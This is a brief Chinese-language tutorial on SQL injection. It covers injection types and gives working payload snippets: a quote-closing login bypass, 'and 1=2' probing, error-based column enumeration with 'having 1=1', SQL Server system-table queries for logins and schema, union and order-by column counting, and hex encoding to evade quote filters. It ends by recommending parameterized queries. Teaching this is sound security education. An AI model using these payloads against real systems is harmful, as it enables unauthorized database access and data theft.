SQL 注入漏洞

首先要知道sql注入形成的原因：用户输入的数据被sql解释器执行

sql注入又分：数字型，字符型，cookie 注入，post注入，延时注入，搜索注入，base64注入

如何甄别一个模块是否有sql注入呢 打个比方

数字型注入

www.baidu.com/test?id=1 有这摸一个页面 我在后面加上

www.baidu.com/test?id=1 and 1=2   如果返回正常无数据就证明此模块可能存在SQL注入漏洞

而注入多存在asp.php弱类型语言中

上面那个例子就是典型的数字型注入

字符型注入

注意字符串闭合问题如下例子

select * from table where name='123' and pwd='123' 如果不知道密码 可以把输入的123 改成

123‘ and1=1 --  在被sql解析器解析时就会变成 select * from table where name='123‘ and1=1 -- ‘and pwd='123'  就这样成功注入了

当然也要注意不同数据库的连接字符串也不同 SQL Server 是+ ，Oracle 是 || ，MySQL 是空格

我们以SQL Server Mysql Oracle  这三种主流数据库为例

SQL Server

如果在程序中没有用try cath 对错误捕捉在进行友好提示 那sql错误信息 就可能直接暴露给用户 如果是攻击者则会暴露更多信息

select * from table where name='123' and pwd='123' 在密码处进行注入  123‘ group by username having 1=1 --  如果列中未包含usrname 列名 那么就会将这个错误直接返回给前台显示 通过sql server 错误提示 用having 对表的字段进行字典枚举 可以获取表所有字段  也可以利用系统数据库获取更多数据库信息 内嵌查询

select * from sys.databases --数据库所有数据库
select * from  sys.sql_logins --所有登录名
select * from INFORMATION_SCHEMA.TABLES --当前数据库的所有表
select * from INFORMATION_SCHEMA.COLUMNS --当前数据库的表列
select * from sys.all_columns --用户定义的对象和列的集合
select * from  sys.database_principals --数据库的权限查询
select * from  sys.database_files --在数据库数据库文件位置
select * from  sys.objects --数据库的日志，存储过程

order by  注入可以知道当前表的列数

order by 100  可以递归知道没出现错误可以确定该数据库有多少列  union 也同样适用

比如 where id=1  注入  id=1 union select null，null  就会包错 会显示合并列不匹配 可以一直加空 直到不报错

当然大部分程序杜绝了’号 可以利用16进制 比如

select * from table id=1&type=0x4568468  可以对特殊语句进行16进制处理

Mysql Oracle   同理 可能语法不同和系统函数不用 但注入手段都是差不多的

为了避免sql 注入 所以对用户所有输入的地方对输入进行参数化处理就可以啦